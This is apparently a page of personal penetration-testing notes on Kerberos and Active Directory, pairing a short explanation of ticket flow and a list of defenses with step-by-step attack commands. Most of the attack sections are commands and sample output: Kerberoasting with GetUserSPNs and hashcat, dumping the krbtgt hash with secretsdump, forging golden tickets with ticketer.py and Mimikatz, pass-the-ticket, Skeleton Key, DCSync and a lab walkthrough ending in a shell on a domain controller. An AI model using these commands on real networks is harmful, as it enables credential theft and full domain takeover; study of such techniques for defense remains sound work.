Kerberos

General

  • 3 Heads of Kerberos:

    • Client > TrustedServer/DC > Server

Ticket Flow

Ticket Flow

Example

Request TGT >

Apply for Drivers License >

< TGT + SessionKey

< Granted with Hologram

TGT + Request to TGS >

Request go to to ABC Store >

< ServiceTicket

< Approved w/ ABC Hash/Ticket

Auth to Service w/ServiceTicket >

Going to ABC Store >

3 Long-Term Keys

  1. Client (me)

  2. Target/Service key

  3. KDC (from krbtgt acct)

Group Policy for TGT Encryption

  • Computer Config > Policy > Windows Settings > Security Settings

  • > Local Policy > Security Options Network Security: Configure enc types allowed for Kerb

Attack Flow

  1. Find AD Accts with SPN (map between service and svc-acct)

  2. Request RC4 service tickets from DC

  3. Extract Service Tickets to file

  4. Offline Brute Force

Kerberoasting Targets

  1. MSSQL

  2. AGPMServer (for GPO)

  3. FIMService (Forefront Identity)

  4. STS (Security Token Service VMWare)

Defenses:

  • Disable RC4 with GPO

  • Use AES instead

  • Managed Service Accounts (no pw to change)

  • Protected Users - pw kerberos keys arent in lsass mem

  • PAC validation

  • CredentialGuard - hash and kerb/keys cant be stolen

  • Services like: "sqlsvc" should not be Domain Admin

Kerberoasting

Connect to pc:
PsExec64.exe -accepteula -u bob \\$IP cmd.exe
pw-prompt: xxxx
whoami   ..bob
ipconfig ..$IP

Pull SPN's
cd \tools\ke*
> cscript.exe GetUserSPNs.vbs   ...or:
> GetUserSPNs.py -request domain\bob -dc-ip $IP > spns.output
Found 'svcqlserver' w/RC4 (bad encryption)

Request Ticket for svcsqlserver:
C:\Tools\Kerb\powershell.exe -command "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'svcsqlserver/dc.domain.local:1433'"

Optional: Grabs tickets with Mimikatz and export to a list
cd ../mim*/x64/
mimikatz.exe
kerberos::list /export
exit

Crack the Kerb:
cd C:\Tools\Kerberoast\
python tgsrepcrack.py dictionary.txt file.kirbi
hashcat -m 13100 -a 0 spns.output /usr/local/..examp.dict

Connect:
cd c:\Tools\Sysinternals\
PsExec64.exe -accepteula -u mydom/svcsqlserver \\$IP cmd.exe
wmiexec.py mydom/svcsqlserver@10.10.10.5 whoami
pw-prompt: crackedpw
hostname .. DC
net user svcsqlserver /domain   ..part of Domain Admins, yikes!
win !!

  • Other Method:

    • Powerview > Invoke-Kerberoast

Golden Ticket

  • Impacket:

    • secretsdump.py

    • wmiexec.py

    • lookupsid.py

    • ticketer.py

Get the nthash

> secretsdump.py mydom/svcsqlserver@$IP -just-dc-user krbtgt

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:abcxyz123...:thenthashxyz1111:::
                          |
                        nthash

Get the FQDN

> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all

Windows IP Configuration
   Host Name . . . . . . . . . . . . : DC01
   Primary Dns Suffix  . . . . . . . : mydom

Get the Domain SID

> lookupsid.py mydom/svcsqlserver@$IP

Password:
[*] Brute forcing SIDs at $IP
[*] StringBinding ncacn_np:$IP[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-111122222-3333334444-5555566666

Create a golden ticket!

> ticketer.py -domain mydom -domain-sid S-1-5-21-111122222-3333334444-5555566666 -nthash thenthashxyz1111 Administrator

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for mydom/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache

Abuse

  • The golden ticket - DO NOT EXECUTE !!!

  • After exporting the Administrator.ccache ticket file..

  • You can use any tool from the impacket suite like wmiexec or psexec with -k -no-pass

> export KRB5CCNAME=Administrator.ccache
> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all -k --no-pass

Mimikatz

  • Create a Golden Ticket with Mimikatz

mimikatz > kerberos::golden /krbtgt :e19xyz... /admin:root
/domain:mydom /sid:S-1-5-21.. /ticket:golden.ticket.bin
Creates "golden.ticket.bin"

pass-the-ticket (ptt)
mimikatz > ptt golden.ticket.bin

Skeleton Key (mimikatz)

  • Sets up a special key for login as pw: mimikatz

  • Patches the LSA Process in Memory

  • Requires Admin rights and Debug Privs

  • Reboot to 'clear' the setup

mimikatz# privilege::debug
mimikatz# misc::skeleton
Done!

DCSync (mimikatz)

  • Copies the "ntds.dit"

  • REF: NTDS

m> lsadump:dcsync /user:administrator

DCShadow

  • Similar to DCSync

  • Register myself as a DC

  • Uses replication, so almost invisible Logging

Mimikatz GT Lab

-----------------
Start
cd \Tools\SysInternalsSuite\
PsExec64.exe -accepteula -u mydomain\svcsqlserver \\$IP cmd.exe
c:\Windows\System32  ..now on $IP!!
whoami /user  ..get the sid

-----------------
Imposter:
cd \tools\m*\x64
> mimikatz.exe
m> lsadump::dcsync /user:fakedc
.. i'm a dc named 'fakedc'
.. Creds: we got the ntlm hash

-----------------
Ticket:
m> kerberos::golden /rc4:xyzhash /user:administrator /domain:mydomain /sid:xyzsid
Created: "ticket.kirbi"

-----------------
Pass-the-ticket
\\10.10.10.10\c$ ..copy the ticket
cd \tools\m*\x64
> mimikatz.exe
kerberos::ptt c:\Users\me\Desktop\ticket.kirbi
exit
klist  ..shows the tickets

-----------------
Exploit:
From 10.10.10.10
PsExec64.exe -accepteula \\dc01 cmd.exe   ..will use the ticket for auth!
PreviousDLL Hijack MSFNextMemory Analysis

Last updated